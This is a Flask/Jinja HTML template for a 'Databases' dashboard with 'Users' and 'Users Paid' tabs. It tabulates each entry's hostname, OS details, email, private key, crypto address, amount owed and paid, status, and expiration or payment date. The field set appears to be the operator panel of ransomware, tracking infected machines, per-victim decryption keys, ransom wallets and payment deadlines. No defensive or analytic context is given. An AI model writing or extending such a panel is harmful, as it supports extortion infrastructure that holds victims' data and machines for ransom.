{% extends "dashboard/base.html" %}

{% block title %}
Databases
{% endblock %}

{% block stylesheets %}
<link rel="stylesheet" href="{{ url_for('static', filename='databases.css') }}">
{% endblock %}

{% block content %}
<!-- Your dashboard-specific content goes here -->
<h1>Databases</h1>
<div class="container mt-5">
    <ul class="nav nav-tabs" id="myTabs" role="tablist">
        <li class="nav-item">
            <a class="nav-link active" id="users-tab" data-toggle="tab" href="#users" role="tab" aria-controls="users" aria-selected="true">Users</a>
        </li>
        <li class="nav-item">
            <a class="nav-link" id="usersPaid-tab" data-toggle="tab" href="#usersPaid" role="tab" aria-controls="usersPaid" aria-selected="false">Users Paid</a>
        </li>
    </ul>
    <div class="tab-content" id="myTabContent">

        <div class="tab-pane fade show active" id="users" role="tabpanel" aria-labelledby="users-tab">
            <input type="text" id="search-input" class="search-bar" placeholder="Search by UID...">
            <table class="table table-responsive table-striped mt-3" id="users-table">
                <thead>
                    <tr>
                        <th>ID</th>
                        <th class="wide-col">Username</th>
                        <th class="wide-col">Hostname</th>
                        <th class="wide-col">UID</th>
                        <th class="wide-col">OS Name</th>
                        <th class="wide-col">OS Version</th>
                        <th class="wide-col">OS Architecture</th>
                        <th class="wide-col">Email</th>
                        <th class="wide-col">Private Key</th>
                        <th class="wide-col">Crypto Address</th>
                        <th class="wide-col">Total Payment</th>
                        <th class="wide-col">Status</th>
                        <th class="wide-col">Amount Paid</th>
                        <th class="wide-col">Creation Date</th>
                        <th class="wide-col">Expiration Date</th>
                    </tr>
                </thead>
                <tbody>
                    {% for user in users %}
                    <tr>
                        <td class="wide-col">{{ user.id }}</td>
                        <td class="wide-col">{{ user.username }}</td>
                        <td class="wide-col">{{ user.hostname }}</td>
                        <td class="wide-col uid-cell">{{ user.uid }}</td>
                        <td class="wide-col">{{ user.os_name }}</td>
                        <td class="wide-col">{{ user.os_version }}</td>
                        <td class="wide-col">{{ user.os_architecture }}</td>
                        <td class="wide-col">{{ user.email }}</td>
                        <td>
                            <div class="scrollable-cell">
                                {{ user.private_key }}
                            </div>
                        </td>
                        <td class="wide-col">{{ user.crypto_address }}</td>
                        <td class="wide-col">{{ user.total_payment }}</td>
                        <td class="wide-col">{{ user.status }}</td>
                        <td class="wide-col">{{ user.amount_paid }}</td>
                        <td class="wide-col">{{ user.creation_date }}</td>
                        <td class="wide-col">{{ user.expiration }}</td>
                    </tr>
                    {% endfor %}
                </tbody>
            </table>
        </div>
        <div class="tab-pane fade" id="usersPaid" role="tabpanel" aria-labelledby="usersPaid-tab">
            <input type="text" id="search-paid-input" class="search-bar" placeholder="Search by UID...">
            <table class="table table-responsive table-striped mt-3" id="users-paid-table">

                <thead>
                    <tr>
                        <th>ID</th>
                        <th class="wide-col">Username</th>
                        <th class="wide-col">Hostname</th>
                        <th class="wide-col">UID</th>
                        <th class="wide-col">OS Name</th>
                        <th class="wide-col">OS Version</th>
                        <th class="wide-col">OS Architecture</th>
                        <th class="wide-col">Email</th>
                        <th class="wide-col">Private Key</th>
                        <th class="wide-col">Crypto Address</th>
                        <th class="wide-col">Total Payment</th>
                        <th class="wide-col">Status</th>
                        <th class="wide-col">Amount Paid</th>
                        <th class="wide-col">Creation Date</th>
                        <th class="wide-col">Payment Date</th>
                    </tr>
                </thead>
                <tbody>
                    {% for user_paid in users_paid %}
                    <tr>
                        <td class="wide-col">{{ user_paid.id }}</td>
                        <td class="wide-col">{{ user_paid.username }}</td>
                        <td class="wide-col">{{ user_paid.hostname }}</td>
                        <td class="wide-col uid-cell">{{ user_paid.uid }}</td>
                        <td class="wide-col">{{ user_paid.os_name }}</td>
                        <td class="wide-col">{{ user_paid.os_version }}</td>
                        <td class="wide-col">{{ user_paid.os_architecture }}</td>
                        <td class="wide-col">{{ user_paid.email }}</td>
                        <td>
                            <div class="scrollable-cell">
                                {{ user_paid.private_key }}
                            </div>
                        </td>
                        <td class="wide-col">{{ user_paid.crypto_address }}</td>
                        <td class="wide-col">{{ user_paid.total_payment }}</td>
                        <td class="wide-col">{{ user_paid.status }}</td>
                        <td class="wide-col">{{ user_paid.amount_paid }}</td>
                        <td class="wide-col">{{ user_paid.creation_date }}</td>
                        <td class="wide-col">{{ user_paid.payment_date }}</td>
                    </tr>
                    {% endfor %}
                </tbody>
            </table>
        </div>
    </div>
</div>
    {% block scripts %}
        <script src="{{ url_for('static', filename='tab_search.js') }}"></script>
    {% endblock %}

{% endblock %}
